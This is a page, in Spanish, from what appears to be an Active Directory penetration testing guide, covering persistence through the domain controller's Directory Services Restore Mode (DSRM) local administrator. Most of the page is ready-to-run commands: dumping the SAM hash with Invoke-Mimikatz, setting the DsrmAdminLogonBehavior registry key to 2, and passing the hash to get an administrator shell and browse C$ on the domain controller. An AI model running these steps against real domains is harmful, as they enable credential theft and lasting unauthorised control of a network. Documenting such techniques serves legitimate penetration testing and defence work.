Active Directory Penetration Testing
Home
  • Inicio
  • General
    • Recursos de aprendizaje
    • Herramientas
  • Recolección de información y enumeración
    • Bypass protecciones PowerShell scripts
    • LLMNR/NBT-NS poisoning
    • Enumeración no autenticada
      • Enumeración de usuarios y grupos
      • Enumeración de política de contraseñas
    • Password spraying
    • Enumeración autenticada
      • BloodHound
      • Domain Name System (DNS)
      • Enumeración de dominios
      • Enumeración de usuarios, grupos y computadoras
      • Enumeración de recursos compartidos
      • Enumeración de política de contraseñas
      • Enumeración de Group Policy Object (GPO)
      • Enumeración de Access Control List (ACL)
      • Enumeración de relaciones de confianza de dominio
  • Movimiento lateral
    • User hunting
    • Microsoft SQL Server (MSSQL)
    • PowerShell remoting
    • Remote Desktop Protocol (RDP)
    • Server Message Block (SMB)
    • Windows Remote Management (WinRM)
    • Pass the Hash (PtH)
    • Pass the Ticket (PtT)
  • Escalamiento de privilegios de dominio
    • Configuraciones incorrectas
    • Credential dumping
    • Usuarios y grupos
    • ASREPRoast
    • Kerberoast
    • DCSync
    • Unconstrained delegation
    • Constrained delegation
  • Escalamiento de privilegios en relaciones de confianza de dominio
    • Kerberoast
    • Foreign group membership
    • SID History
  • Persistencia
    • Golden Ticket
    • Silver Ticket
    • Skeleton Key
    • Directory Services Restore Mode (DSRM)
  • Vulnerabilidades
    • NoPac
    • PrintNightmare
Con tecnología de GitBook
En esta página
  • Descripción
  • Invoke-Mimikatz

¿Te fue útil?

  1. Persistencia

Directory Services Restore Mode (DSRM)

Descripción

Existe un administrador local en cada controlador de dominio, cuya contraseña corresponde a la ingresada en la opción de Directory Services Restore Mode (DSRM) al momento de instalar el servicio de Active Directory. Realizando una modificación al registro de Windows es posible activar dicha contraseña, para luego extraer su hash NT y acceder al controlador de dominio como administrador local utilizando Pass the Hash (PtH).

Invoke-Mimikatz

1) Obtención de hash NT del administrador local del controlador de dominio con Invoke-Mimikatz.

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername <computer-name-DC>

2) Configuración de registro DsrmAdminLogonBehavior con valor 2.

# Comprobación si existe registro DsrmAdminLogonBehavior
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior

# Creación de registro DsrmAdminLogonBehavior y asignación de valor 2 si no existe
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD

# Actualización de valor del registro DsrmAdminLogonBehavior a 2 si ya existe
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2

Pass the Hash (PtH) a controlador de dominio con sesión de administrador local.

# Pass the Hash (PtH)
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<computer-name-DC> /user:Administrator /ntlm:<NT-hash-computer-DC> /run:powershell.exe"'

# Lectura de archivos
dir \\<computer-name-DC>\C$
AnteriorSkeleton KeySiguienteNoPac

Última actualización hace 2 años

¿Te fue útil?